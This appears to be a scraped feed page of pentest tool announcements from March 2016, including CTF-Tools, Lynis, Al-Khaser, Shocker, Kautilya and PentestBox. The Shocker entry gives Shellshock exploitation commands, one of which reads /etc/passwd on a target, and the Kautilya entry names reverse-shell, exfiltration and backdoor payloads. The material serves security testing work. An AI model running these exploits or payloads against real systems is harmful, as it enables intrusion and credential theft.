Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

CTF-Tools - Some setup scripts for security research tools

March 18, 2016, 3:31 pm
$
0
0
This is a collection of setup scripts to create an install of various security research tools. Of course, this isn't a hard problem, but it's really nice to have them in one place that's easily deployable to new machines and so forth.

Installers for the following tools are included:
Category Tool Description
binary afl State-of-the-art fuzzer.
binary angr Next-generation binary analysis engine from Shellphish.
binary barf Binary Analysis and Reverse-engineering Framework.
binary bindead A static analysis tool for binaries.
binary checksec Check binary hardening settings.
binary codereason Semantic Binary Code Analysis Framework.
binary crosstool-ng Cross-compilers and cross-architecture tools.
binary cross2 A set of cross-compilation tools from a Japanese book on C.
binary elfkickers A set of utilities for working with ELF files.
binary elfparser Quickly determine the capabilities of an ELF binary through static analysis.
binary evilize Tool to create MD5 colliding binaries
binary gdb Up-to-date gdb with python2 bindings.
binary panda Platform for Architecture-Neutral Dynamic Analysis.
binary pathgrind Path-based, symbolically-assisted fuzzer.
binary peda Enhanced environment for gdb.
binary preeny A collection of helpful preloads (compiled for many architectures!).
binary pwntools Useful CTF utilities.
binary python-pin Python bindings for pin.
binary qemu Latest version of qemu!
binary qira Parallel, timeless debugger.
binary radare2 Some crazy thing crowell likes.
binary rp++ Another gadget finder.
binary shellnoob Shellcode writing helper.
binary shellsploit Shellcode development kit.
binary snowman Cross-architecture decompiler.
binary taintgrind A valgrind taint analysis tool.
binary villoc Visualization of heap operations.
binary virtualsocket A nice library to interact with binaries.
binary xrop Gadget finder.
forensics binwalk Firmware (and arbitrary file) analysis tool.
forensics dislocker Tool for reading Bitlocker encrypted partitions.
forensics exetractor Unpacker for packed Python executables. Supports PyInstaller and py2exe.
forensics firmware-mod-kit Tools for firmware packing/unpacking.
forensics pdf-parser Tool for digging in PDF files
forensics scrdec A decoder for encoded Windows Scripts.
forensics testdisk Testdisk and photorec for file recovery.
crypto cribdrag Interactive crib dragging tool (for crypto).
crypto foresight A tool for predicting the output of random number generators. To run, launch "foresee".
crypto hashpump A tool for performing hash length extension attaacks.
crypto hashpump-partialhash Hashpump, supporting partially-unknown hashes.
crypto hash-identifier Simple hash algorithm identifier.
crypto littleblackbox Database of private SSL/SSH keys for embedded devices.
crypto msieve Msieve is a C library implementing a suite of algorithms to factor large integers.
crypto pemcrack SSL PEM file cracker.
crypto pkcrack PkZip encryption cracker.
crypto python-paddingoracle Padding oracle attack automation.
crypto reveng CRC finder.
crypto ssh_decoder A tool for decoding ssh traffic. You will need ruby1.8 from https://launchpad.net/~brightbox/+archive/ubuntu/ruby-ng to run this. Run with ssh_decoder --help for help, as running it with no arguments causes it to crash.
crypto sslsplit SSL/TLS MITM.
crypto xortool XOR analysis tool.
crypto yafu Automated integer factorization.
web burpsuite Web proxy to do naughty web stuff.
web commix Command injection and exploitation tool.
web dirs3arch Web path scanner.
web sqlmap SQL injection automation engine.
web subbrute A DNS meta-query spider that enumerates DNS records, and subdomains.
stego sound-visualizer Audio file visualization.
stego steganabara Another image steganography solver.
stego stegdetect Steganography detection/breaking tool.
stego stegsolve Image steganography solver.
android apktool Dissect, dis-assemble, and re-pack Android APKs
There are also some installers for non-CTF stuff to break the monotony!
Category Tool Description
game Dwarf Fortress Something to help you relax after a CTF!

Usage
To use, do: 
# set up the path
/path/to/ctf-tools/bin/manage-tools setup
source ~/.bashrc

# list the available tools
manage-tools list

# install gdb, allowing it to try to sudo install dependencies
manage-tools -s install gdb

# install pwntools, but don't let it sudo install dependencies
manage-tools install pwntools

# uninstall gdb
manage-tools uninstall gdb

# uninstall all tools
manage-tools uninstall all

# search for a tool
manage-tools search preload
Where possible, the tools keep the installs very self-contained (i.e., in to tool/ directory), and most uninstalls are just calls to git clean ( NOTE , this is NOT careful; everything under the tool directory, including whatever you were working on, is blown away during an uninstall). To support python dependencies, however, make sure to create a virtualenv before installing and using tools (i.e., mkvirtualenv --system-site-packages ctf . The --system-site-packages is there for easier reuse of apt-gotten python packages where necessary).

Docker
By popular demand, a Dockerfile has been included. You can build a docker image with: 
git clone https://github.com/zardus/ctf-tools
docker build -t ctf-tools .
And run it with: 
docker run -it ctf-tools
The built image will have ctf-tools cloned and ready to go, but you will still need to install the tools themselves (see above).

Vagrant
You can build a Vagrant VM with: 
wget https://raw.githubusercontent.com/zardus/ctf-tools/master/Vagrantfile
vagrant up
And connect to it via: 
vagrant ssh

Adding Tools
To add a tool (say, named toolname ), do the following:
  1. Create a toolname directory.
  2. Create an install script.
  3. (optional) if special uninstall steps are required, create an uninstall script.

Install Scripts
The install script will be run with $PWD being toolname . It should install the tool into this directory, in as contained a manner as possible. Ideally, full uninstallation should be possible with a git clean .
The install script should create a bin directory and put its executables there. These executables will be automatically linked into the main bin directory for the repo. They could be launched from any directory, so don't make assumptions about the location of $0 !


Search

DbDat - Db Database Assessment Tool

March 19, 2016, 11:30 am
$
0
0
DbDat performs numerous checks on a database to evaluate security. The categories of checks performed are configuration, privileges, users, and information. Checks are performed by running queries or reading database configuration files. The goal of this tool is to highlight issues that need immediate attention and identify configuration settings that should be reviewed for appropriateness. This tool is not for identifying SQL Injection vulnerabilities in an application, there are good tools available for that already (e.g. https://github.com/sqlmapproject ). Also, this tool does not attempt to determine what CVEs may impact the version of the target database (but may do so in the future - maybe). Rather, this tool can help you better understand the potential impact of a successful SQL Injection attack due to weak configuration or access controls. A majority of the checks are from the CIS ( https://cisecurity.org) Security Benchmarks for databases, so thanks to the CIS! The benchmark documents can be found here: https://benchmarks.cisecurity.org/downloads/browse/index.cfm?category=benchmarks.servers.database

Finally, DbDat is intended to be a framework to enable easy creation of new plugins and checks. Contributions from the security, or even database administrator, community is what will make this a great tool. The current set of checks are in no way complete, certainly more needs to be done. Please contribute!

Developing New Database Checks
Pull requests are very welcome! Checks are organized by database type (e.g. MySQL, Oracle, MS SQL, etc.) in the plugins folder. Each check is a single python file that must have check_ at the begining of the file name. Each file contains a class with a do_check method. This method is the primary logic for checks. The quick way to get started is to copy an existing check file and modify it. However, see the Developing Plugins section below for more details.

Running DbDat
  1. Be sure you have the necessary dependencies installed for Python scripts to connect to your target database. See dependencies section below.
  2. Add a connection profile entry in the etc/dbdat.conf file for each database you want to assess.
  3. Run: python dbdat.py -p <profile name>
  4. View the report. To view the report cd to reports directory and run python -m SimpleHTTPServer 9000 (or choose a port number you prefer). Then open your browser and navigate to http://localhost:9000 .
To see a list of additional command line arguments run python dbdat.py -h

Report Output
The report organizes results by levels, which are RED, YELLOW, ORANGE, GRAY, and GREEN.
  • RED - items needing immediate attention.
  • YELLOW - items needing review.
  • ORANGE - checks that failed to execute properly.
  • GRAY - items that may not be applicable to the version of the database being assessed.
  • GREEN - items that passed

Dependencies
So far DbDat has been tested on Debian Linux, CentOS Linux, and Windows 7 with Python 2.7

MySQL support
Run: pip install MySQL-python
Or on Debian, run: apt-get install python-mysqldb

PostgreSQL support
Run: pip install psycopg2

Oracle support
Run: pip install cx_Oracle
Note: you will need to install Oracle client libraries for this to work.

MS SQL support
Run: pip install pymssql

Sybase support
  • todo

DB2 support
Run: pip install ibm_db or easy_install ibm_db
Note: you will need to ensure the user running DbDat has access to execute DB2 CLP commands (e.g. db2 and db2level).

MongoDB support
Run: pip install mongodb
To support MongoDB YAML config files run: pip install pyyaml

CouchDB support
Run: pip install couchdb


Lynis 2.2.0 - Security Auditing Tool for Unix/Linux Systems

March 20, 2016, 3:03 pm
$
0
0

Lynis is an open source security auditing tool. Commonly used by system administrators, security professionals and auditors, to evaluate the security defenses of their Linux/Unix based systems. It runs on the host itself, so it can perform very extensive security scans.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

No installation required

The tool is very flexible and easy to use. It is one of the few tools, in which installation is optional. Just place it on the system, give it a command like "audit system", and it will run. It is written in shell script and released as open source software (GPL).

How it works

Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
During the scan, technical details about the scan are stored in a log file. At the same time findings (warnings, suggestions, data collection), are stored in a report file.

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.
For example if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers a SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates, so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Parameters
--auditor "Given name Surname"     Assign an auditor name to the audit (report)
--checkall  -c  Start the check
--check-update     Check if Lynis is up-to-date
--cronjob     Run Lynis as cronjob (includes -c -Q)
--help  -h  Shows valid parameters
--manpage     View man page
--nocolors     Do not use any colors
--pentest     Perform a penetration test scan (non-privileged)
--quick  -Q  Don't wait for user input, except on errors
--quiet     Only show warnings (includes --quick, but doesn't wait)
--reverse-colors   Use a different color scheme for lighter backgrounds
--version  -V  Check program version (and quit)

Changelog
Lynis 2.2.0
= Lynis 2.2.0 (2016-03-18) =

We are proud to present this new release of Lynis. It is a major upgrade, and the
result of many months of work. This version includes new features and tests, and
many small enhancements. We encourage all to test and upgrade to this latest
release.

* Highlights
------------
The biggest change in this release is the optimization of several functions. It
allows for better detection, and dealing with the quirks, of every single
operating system. Some functions were fortified to handle unexcepted results
better, like missing a particular binary, or not returning the hostname.

This release also enables tests to be shorter, by adding new functions. Some
functions were renamed or slightly changed, to provide more value to the tooling.
Another big change in this release is a wide set of optimizations and quality
testing. Outdated pieces were removed, or rewritten, to support features seen in
newer distributions.

In the area of compliance, adjustments have been made to start supporting more
in-depth testing for this. Ideal for companies who have a particular compliance
need, or want to test and enforce the system hardening levels of their systems.

Last but not least, many small changes make this software easier to use. On
our website we added new guides to provide help and support.

We like to thank our contributors, in particular Kamil Boratyński, Steve Bosek,
and Eric Light. Their contributions helped us greatly shaping this release.


Al-Khaser - Public Malware Techniques Used In The Wild

March 21, 2016, 3:30 pm
$
0
0


al-khaser is a PoC malware with good intentions that aimes to stress your anti-malware system. It performs a bunch of nowadays malwares tricks and the goal is to see if you catch them all.

Possible uses
  • You are making an anti-debug plugin and you want to check its effectiveness.
  • You want to ensure that your sandbox solution is hidden enough.
  • Or you want to ensure that your malware analysis environement is well hidden.
Please, if you encounter any of the anti-analysis tricks which you have seen in a malware, don't hesitate to contribute.

Features

Anti-debugging attacks
  • IsDebuggerPresent
  • CheckRemoteDebuggerPresent
  • Process Environement Block (BeingDebugged)
  • Process Environement Block (NtGlobalFlag)
  • ProcessHeap (Flags)
  • ProcessHeap (ForceFlags)
  • NtQueryInformationProcess (ProcessDebugPort)
  • NtQueryInformationProcess (ProcessDebugFlags)
  • NtQueryInformationProcess (ProcessDebugObject)
  • NtSetInformationThread (HideThreadFromDebugger)
  • NtQueryObject (ObjectTypeInformation)
  • NtQueryObject (ObjectAllTypesInformation)
  • CloseHanlde (NtClose) Invalide Handle
  • UnhandledExceptionFilter
  • OutputDebugString (GetLastError())
  • Hardware Breakpoints (SEH / GetThreadContext)
  • Software Breakpoints (INT3 / 0xCC)
  • Memory Breakpoints (PAGE_GUARD)
  • Interrupt 0x2d
  • Interrupt 1
  • Parent Process (Explorer.exe)
  • SeDebugPrivilege (Csrss.exe)
  • NtYieldExecution / SwitchToThread

Anti-virtualization
  • Virtualbox registry key values artifacts:
    • "HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier)
    • HARDWARE\Description\System (SystemBiosVersion)
    • HARDWARE\Description\System (VideoBiosVersion)
    • HARDWARE\Description\System (SystemBiosDate)
  • Virtualbox registry Keys artifacts
    • "HARDWARE\ACPI\RSDT\VBOX__"
    • "HARDWARE\ACPI\FADT\VBOX__"
    • "HARDWARE\ACPI\RSDT\VBOX__"
    • "SOFTWARE\Oracle\VirtualBox Guest Additions"
    • "SYSTEM\ControlSet001\Services\VBoxGuest"
    • "SYSTEM\ControlSet001\Services\VBoxMouse"
    • "SYSTEM\ControlSet001\Services\VBoxService"
    • "SYSTEM\ControlSet001\Services\VBoxSF"
    • "SYSTEM\ControlSet001\Services\VBoxVideo"
  • Virtualbox file system artifacts:
    • "system32\drivers\VBoxMouse.sys"
    • "system32\drivers\VBoxGuest.sys"
    • "system32\drivers\VBoxSF.sys"
    • "system32\drivers\VBoxVideo.sys"
    • "system32\vboxdisp.dll"
    • "system32\vboxhook.dll"
    • "system32\vboxmrxnp.dll"
    • "system32\vboxogl.dll"
    • "system32\vboxoglarrayspu.dll"
    • "system32\vboxoglcrutil.dll"
    • "system32\vboxoglerrorspu.dll"
    • "system32\vboxoglfeedbackspu.dll"
    • "system32\vboxoglpackspu.dll"
    • "system32\vboxoglpassthroughspu.dll"
    • "system32\vboxservice.exe"
    • "system32\vboxtray.exe"
    • "system32\VBoxControl.exe"
  • Virtualbox directories artifacts:
    • "oracle\virtualbox guest additions\"
  • Virtualbox MAC Address:
    • "\x08\x00\x27"
  • Virtualbox virtual devices:
    • "\\.\VBoxMiniRdrDN"
    • "\\.\VBoxGuest"
    • "\\.\pipe\VBoxMiniRdDN"
    • "\\.\VBoxTrayIPC"
    • "\\.\pipe\VBoxTrayIPC")
  • Virtualbox Windows Class
    • VBoxTrayToolWndClass
    • VBoxTrayToolWnd
  • Virtualbox network share
    • VirtualBox Shared Folders
  • Virtualbox process list
    • vboxservice.exe
    • vboxtray.exe

Anti Dumping
  • Erase PE header from memory

Code/DLL Injections techniques
  • CreateRemoteThread
  • SetWindowsHooksEx
  • NtCreateThreadEx
  • RtlCreateUserThread
  • APC (QueueUserAPC / NtQueueApcThread)
  • RunPE (GetThreadContext / SetThreadContext)

Timing Attacks
  • Sleep -> SleepEx -> NtDelayExecution
  • SetTimer (Standard Windows Timers)
  • timeSetEvent (Multimedia Timers)


Shocker - A tool to find and exploit servers vulnerable to Shellshock

March 22, 2016, 2:56 pm
$
0
0

A tool to find and exploit servers vulnerable to Shellshock

Help Text
usage: shocker.py
-h, --help show this help message and exit
--Host HOST, -H HOST A target hostname or IP address
--file FILE, -f FILE File containing a list of targets
--port PORT, -p PORT The target port number (default=80)
--exploit EXPLOIT, -e EXPLOIT Command to execute (default=/bin/uname -a)
--cgi CGI, -c CGI Single CGI to check (e.g. /cgi-bin/test.cgi)
--proxy PROXY A BIT BROKEN RIGHT NOW Proxy to be used in the form 'ip:port'
--ssl, -s Use SSL (default=False)
--threads THREADS, -t THREADS Maximum number of threads (default=10, max=100)
--verbose, -v Be verbose in output

Usage Examples
./shocker.py -H 127.0.0.1 -e "/bin/cat /etc/passwd" -c /cgi-bin/test.cgi
Scans for http://127.0.0.1/cgi-bin/test.cgi and, if found, attempts to cat /etc/passwd
./shocker.py -H www.example.com -p 8001 -s
Scan www.example.com on port 8001 using SSL for all scripts in cgi_list and attempts the default exploit for any found
./shocker.py -f ./hostlist
Scans all hosts listed in the file ./hostlist with the default options

Dependencies
Python 2.7+

Change Log
Changes in version 0.72 (December 2014)
  • Minor corrections to logic and typos
Changes in version 0.71 (December 2014)
  • Added timeout to urllib2.urlopen requests using a global 'TIMEOUT'
Changes in version 0.7 (November 2014)
  • Add interactive 'psuedo console' for further exploitation of a chosen vulnerable server
  • Attemped to clean up output buffering issues by wrapping sys.stdout in a class which flushes on every call to write
  • Added a progress indicator for use in time consuming tasks to reassure non vebose users
Changes in version 0.6 (October 2014)
  • Preventing return codes other than 200 from being considered successes
  • Added ability to specify multiple targets in a file
  • Moved the 'cgi_list' list of scripts to attempt to exploit to a file
  • Fixed some output formatting issues
  • Fixed valid hostname/IP regex to allow single word hostnames
Changes in version 0.5 (October 2014)
  • Added ability to specify a single script to target rather than using cgi_list
  • Introduced a timeout on socket operations for host_check
  • Added some usage examples in the script header
  • Added an epilogue to the help text indicating presence of examples
Changes in version 0.4 (October 2014)
  • Introduced a thread count limit defaulting to 10
  • Removed colour support until I can figure out how to make it work in Windows and *nix equally well
  • Spelling corrections
  • More comprehensive cgi_list
  • Removes success_flag from output
Pre 0.4 (October 2014)
  • No idea

TODO
  • Identify and respond correctly to HTTP/200 response - false positives - Low priority/hassle
  • Implement curses for *nix systems - For the whole application or only psuedo terminal? - Low priority/prettiness
  • Thread the initial host check now that multiple targets are supported (and could be make this bit time consuming)
  • Change verbose to integer value - quiet, normal, verbose, debug?
  • Add option to skip initial host checks for the sake of speed?
  • Add a summary of results before exiting
  • Save results to a file? Format?
  • Eventually the idea is to include multiple possible vectors but currently only one is checked.
  • Add Windows and *nix colour support - Low priority/prettiness
  • Add a timeout in interactive mode for commands which don't return, e.g. /bin/cat /dev/zero
  • Prettify - Low priority/pretinness (obviously)
  • Add support for scanning and explointing SSH and SMTP? https://isc.sans.edu/diary/Shellshock+via+SMTP/18879
  • Add SOCKS proxy support, potentially using https://github.com/rpicard/socksonsocks/ from Rober Picard
  • Other stuff. Probably.


Jsprime - A JavaScript Static Security Analysis Tool

March 23, 2016, 3:30 pm
$
0
0
Today, more and more developers are switching to JavaScript as their first choice of language. The reason is simple JavaScript has now been started to be accepted as the mainstream programming for applications, be it on the web or on the mobile; be it on client-side, be it on the server side. JavaScript flexibility and its loose typing is friendly to developers to create rich applications at an unbelievable speed. Major advancements in the performance of JavaScript interpreters, in recent days, have almost eliminated the question of scalability and throughput from many organizations. So the point is JavaScript is now a really important and powerful language we have today and it's usage growing everyday. From client-side code in web applications it grew to server-side through Node.JS and it's now supported as proper language to write applications on major mobile operating system platforms like Windows 8 apps and the upcoming Firefox OS apps.

But the problem is, many developers practice insecure coding which leads to many client side attacks, out of which DOM XSS is the most infamous. We tried to understand the root cause of this problem and figured out is that there are not enough practically usable tools that can solve real-world problems. Hence as our first attempt towards solving this problem, we want to talk about JSPrime: A JavaScript static analysis tool for the rest of us. It's a very light-weight and very easy to use point-and-click tool! The static analysis tool is based on the very popular Esprima ECMAScript parser by Aria Hidayat.

I would like to highlight some of the interesting features of the tool below:
  • JS Library Aware Source & Sinks
  • Most dynamic or static analyzers are developed to support native/pure JavaScript which actually is a problem for most developers since the introductions and wide-adoption for JavaScript frameworks/libraries like jQuery, YUI etc. Since these scanners are designed to support pure JavaScript, they fail at understanding the context of the development due to the usage of libraries and produce many false-positives and false-negatives. To solve this we have identified the dangerous user input sources and code execution sink functions for jQuery and YUI, for the initial release and we shall talk about how users can easily extend it for other frameworks.
  • Variable & Function Tracing (This feature is a part of our code flow analysis algorithm)
  • Variable & Function Scope Aware analysis (This feature is a part of our code flow analysis algorithm)
  • Known filter function aware
  • OOP & Protoype Compliant
  • Minimum False Positive alerts
  • Supports minified JavaScript
  • Blazing fast performance
  • Point and Click :-) (my personal favorite)
Upcoming features:

Links

Usage

Web Client
Open "index.html" in your browser.

Server-Side (Node.JS)
  1. In the terminal type "node server.js"
  2. Go to 127.0.0.1:8888 in your browser.


Kautilya - Tool for easy use of Human Interface Devices for offensive security and penetration testing

March 24, 2016, 3:00 pm
$
0
0

Kautilya is a toolkit which provides various payloads for a Human Interface Device which may help in breaking in a computer during penetration tests.

List of Payloads

Windows

Gather
  • Gather Information
  • Hashdump and Exfiltrate
  • Keylog and Exfiltrate
  • Sniffer
  • WLAN keys dump
  • Get Target Credentials
  • Dump LSA Secrets
  • Dump passwords in plain
  • Copy SAM
  • Dump Process Memory
  • Dump Windows Vault Credentials

Execute
  • Download and Execute
  • Connect to Hotspot and Execute code
  • Code Execution using Powershell
  • Code Execution using DNS TXT queries
  • Download and Execute PowerShell Script
  • Execute ShellCode
  • Reverse TCP Shell

Backdoor
  • Sethc and Utilman backdoor
  • Time based payload execution
  • HTTP backdoor
  • DNS TXT Backdoor
  • Wireless Rogue AP
  • Tracking Target Connectivity
  • Gupt Backdoor

Escalate
  • Remove Update
  • Forceful Browsing

Manage
  • Add an admin user
  • Change the default DNS server
  • Edit the hosts file
  • Add a user and Enable RDP
  • Add a user and Enable Telnet
  • Add a user and Enable Powershell Remoting

Drop Files
  • Drop a MS Word File
  • Drop a MS Excel File
  • Drop a CHM (Compiled HTML Help) file
  • Drop a Shortcut (.LNK) file
  • Drop a JAR file

Misc
  • Browse and Accept Java Signed Applet
  • Speak on Target

Linux
  • Download and Execute
  • Reverse Shells using built in tools
  • Code Execution
  • DNS TXT Code Execution
  • Perl reverse shell (MSF)

OSX
  • Download and Execute
  • DNS TXT Code Execution
  • Perl Reverse Shell (MSF)
  • Ruby Reverse Shell (MSF)

Payloads Compatibility
  • The Windows payloads and modules are written mostly in powershell (in combination with native commands) and are tested on Windows 7 and Windows 8.
  • The Linux payloads are mostly shell scripts (those installed by default) in combination with commands. These are tested on Ubuntu 11.
  • The OS X payloads are shell scripts (those installed by default) with usage of native commands. Tested on OS X Lion running on a VMWare

Usage
Run kautilya.rb and follow the menus. Kautilya asks for your inputs for various options. The generated payload is copied to the output directory of Kautilya.
The generated payload is an arduino sketch, ready to be used with Arduino IDE. Burn it to Human Interface Device of your choice and have fun!

Supported Human Interface Devices
In principal Kautilya should work with any HID capable of acting as a keyboard. Kautilya has been tested on Teensy++2.0 and Teensy 3.0 from pjrc.com. Updates about Kautilya can be found most of the times at my blog http://labofapenetrationtester.com/ and google group.

User Group
For any queries, discussions and feedback, post to official google group http://groups.google.com/group/kautilya-users or mail me at nikhil d0t uitrgpv at gmail.com

Bugs and Feature requests
Raise an issue or post to the google group.

Dependencies
Kautilya needs colored, highline and artii (and win32console on Windows) gems. Use
bundle install
to install all the required gems.


Guinevere - Automated Security Assessment Reporting Tool

March 25, 2016, 1:30 pm
$
0
0

This tool works with Gauntlet (a private tool) to automate assessment reporting.
Main features include:
  • Generate Assessment Report
  • Export Assessment
  • Generate Retest Report
  • Generate Pentest Checklist

Generate Assessment Report
This option will generate you .docx report based on the vulnerabilities identified during an assessment. The report will contain a bullet list of findings, the vulnerability report write-up, and a table of interesting hosts to include host names and ports. Each report write up automatically calculates the number of affected hosts and updates the report verbiage accordingly.

Export Assessment
An SQL dump of the assessment data from gauntlet will be export to a .sql file. This file can later be imported into by other analysts.

Generate Retest Report
A .docx retest report will be generated. The tool will evaluate the original assessment findings against the retest findings. The retest findings don't need to be ranked as only the severity level of a vulnerability found in the orginial assessment will be used. New vulnerabilities and new hosts found during the retest will also be ignored. The report will contain a list of vulnerabilities along with their status (Remediated, Partially Remediated, or Not Remediated). A table will also be provided that contains hosts that are still vulnerable. A statistics table is also provided to be used with building graphs or charts.

Generate Pentest Checklist - BETA
The Pentest Checklist is an HTML document used for information managment while conducting a pentest. The generated report provides the analyst with a list of host and their open ports along with space for note taking. This is stil under development and provides basic functionalty. The data is retrieved from the Gauntlet database. The "-T" flag can be used to display out from tools such as Nessus but is very verbose.

Usage 
usage: Guinevere.py [-h] [-H DB_HOST] [-U DB_USER] [-P DB_PASS] [-p DB_PORT]
                    [-l LINES] [-A] [-V] [-sC] [-sH] [-sM] [-sL] [-sI] [-aD]
                    [-T]

optional arguments:
  -h, --help            show this help message and exit
  -H DB_HOST, --db-host DB_HOST
                        MySQL Database Host. Default set in script
  -U DB_USER, --db-user DB_USER
                        MySQL Database Username. Default set in script
  -P DB_PASS, --db-pass DB_PASS
                        MySQL Database Password. Default set in script
  -p DB_PORT, --db-port DB_PORT
                        MySQL Database Port. Default set in script
  -l LINES, --lines LINES
                        Number of lines to display when selecting an engagement. Default is 10
  -A, --all-vulns       Include all vulnerability headings when there are no associated report narratives
  -V, --all-verb        Include all vureto vulnerability verbiage when there are no associated report narratives
  -sC                   Exclude Critical-Severity Vulnerabilities
  -sH                   Exclude High-Severity Vulnerabilities
  -sM                   Exclude Medium-Severity Vulnerabilities
  -sL                   Include Low-Severity Vulnerabilities
  -sI                   Include Informational-Severity Vulnerabilities
  -aD, --assessment-date
                        Include the date when selecting an assessment to report on
  -T, --tool-output     Include Tool Output When Printing G-Checklist


Search

Rack-Bug - Debugging Toolbar For Rack Applications Implemented As Middleware

March 26, 2016, 12:00 pm
$
0
0
Rack::Bug adds a diagnostics toolbar to Rack apps. When enabled, it injects a floating div allowing exploration of logging, database queries, template rendering times, etc.

Features
  • Password-based security
  • IP-based security
  • Rack::Bug instrumentation/reporting is broken up into panels.
    • Panels in default configuration:
      • Rails Info
      • Timer
      • Request Variables
      • SQL
      • Active Record
      • Cache
      • Templates
      • Log
      • Memory
    • Other bundled panels:
      • Redis
      • Sphinx
    • The API for adding your own panels is simple and powerful

Rails quick start 
script/plugin install git://github.com/brynary/rack-bug.git
In config/environments/development.rb, add: 
config.middleware.use "Rack::Bug",
  :secret_key => "someverylongandveryhardtoguesspreferablyrandomstring"
Add the bookmarklet to your browser: 
open http://RAILS_APP/__rack_bug__/bookmarklet.html

Using with non-Rails Rack apps
Just 'use Rack::Bug' as any other middleware. See the SampleApp in the spec/fixtures folder for an example Sinatra app.
If you wish to use the logger panel define the LOGGER constant that is a ruby Logger or ActiveSupport::BufferedLogger

Configuring custom panels
Specify the set of panels you want, in the order you want them to appear: 
require "rack/bug"

ActionController::Dispatcher.middleware.use Rack::Bug,
  :secret_key => "someverylongandveryhardtoguesspreferablyrandomstring",
  :panel_classes => [
    Rack::Bug::TimerPanel,
    Rack::Bug::RequestVariablesPanel,
    Rack::Bug::RedisPanel,
    Rack::Bug::TemplatesPanel,
    Rack::Bug::LogPanel,
    Rack::Bug::MemoryPanel
  ]

Running Rack::Bug in staging or production
We have have found that Rack::Bug is fast enough to run in production for specific troubleshooting efforts.

Configuration
Add the middleware configuration to an initializer or the appropriate environment files, taking the rest of this section into consideration.

Security
Restrict access to particular IP addresses: 
require "ipaddr"

ActionController::Dispatcher.middleware.use "Rack::Bug"
  :secret_key => "someverylongandveryhardtoguesspreferablyrandomstring",
  :ip_masks   => [IPAddr.new("2.2.2.2/0")]
Restrict access using a password: 
ActionController::Dispatcher.middleware.use "Rack::Bug",
  :secret_key => "someverylongandveryhardtoguesspreferablyrandomstring",
  :password   => "yourpassword"

Authors
  • Maintained by Bryan Helmkamp
  • Contributions from Luke Melia, Joey Aghion, Tim Connor, and more

Development
For development, you'll need to install the following gems: rspec, rack-test, webrat, sinatra


Meld - Visual Diff And Merge Tool Targeted At Developers

March 28, 2016, 3:30 pm
$
0
0

Meld is a visual diff and merge tool targeted at developers. Meld helps you compare files, directories, and version controlled projects. It provides two- and three-way comparison of both files and directories, and has support for many popular version control systems.

Meld helps you review code changes and understand patches. It might even help you to figure out what is going on in that merge you keep avoiding.

Features

File comparison

  • Edit files in-place, and your comparison updates on-the-fly
  • Perform two- and three-way diffs and merges
  • Easily navigate between differences and conflicts
  • Visualise global and local differences with insertions, changes and conflicts marked
  • Use the built-in regex text filtering to ignore uninteresting differences
  • Syntax highlighting

Directory comparison

  • Compare two or three directories file-by-file, showing new, missing, and altered files
  • Directly open file comparisons of any conflicting or differing files
  • Filter out files or directories to avoid seeing spurious differences
  • Simple file management is also available

Version control

  • Meld supports many version control systems, including Git, Mercurial, Bazaar and SVN
  • Launch file comparisons to check what changes were made, before you commit
  • View file versioning statuses
  • Simple version control actions are also available (i.e., commit/update/add/remove/delete files)

Merge mode (in development)

  • Automatically merge two files using a common ancestor
  • Mark and display the base version of all conflicting changes in the middle pane
  • Visualise and merge independent modifications of the same file
  • Lock down read-only merge bases to avoid mistakes
  • Command line interface for easy integration with existing tools, including git mergetool

Requirements

  • Python 2.7 (Python 3 not yet supported)
  • GTK+ 3.12 (3.14 in development)
  • GLib 2.36
  • PyGObject 3.8 (3.14 in development)
  • GtkSourceView 3.10 (3.14 in development)


PentestBox 2.0 - Portable Penetration Testing Distribution for Windows Environments

March 29, 2016, 3:48 pm
$
0
0

PentestBox provides all security tools as a software package, eliminating requirement of Virtual machines or dualboot environments on Windows Operating System.

It is created because more than 50% of penetration testing distribution users uses windows. [Source]

So it provides an efficient platform for Penetration Testing on windows platform.

There are two variants of PentestBox, one without Metasploit and other one with Metasploit.

Antiviruses and Firewalls needs to be switched off to install and operate the version with Metasploit.

Download any of the variant by clicking respective download button present on the right side.

By default installer extract to C:/PentestBox/, and for its proper functioning do not make any changes.

Easy To Use

It is a commandline utility which is all what you want. You can get to know about the commands on tools.pentestbox.com.

Awesome Design

It is the same green font on black terminal but in an modern way.

Best Performance

PentestBox directly runs on host machine instead of virtual machines, so performance is obvious.

No Dependencies Needed

All the dependencies required by tools are inside PentestBox, so you can even run PentestBox on freshly installed windows without any hassle.

Portable

PentestBox is entirely portable, so now you can carry your own Penetration Testing Environment on a USB stick. It will take care of dependencies required to run tools which are inside it.

Linux Environment

PentestBox contains nearly all linux utilities like bash, cat, chmod, curl, git, gzip, ls, mv, ps, ssh, sh, uname and others. It even contains your favourite text editor "vim". For complete list, please look at tools.pentestbox.com/#linux-utilities.

Because of this most of the pentesting tools which were earlier compatible only with Linux are working smoothly in PentestBox.

No Drivers Issue

Windows has already large support of drivers for Graphic Card and wireless. So now you don't have to worry about drivers compaitability issues. For Example now you can use your GPU power to crack hashes using Project RainbowCrack which is particularly not compaitable on linux environment.

Modular

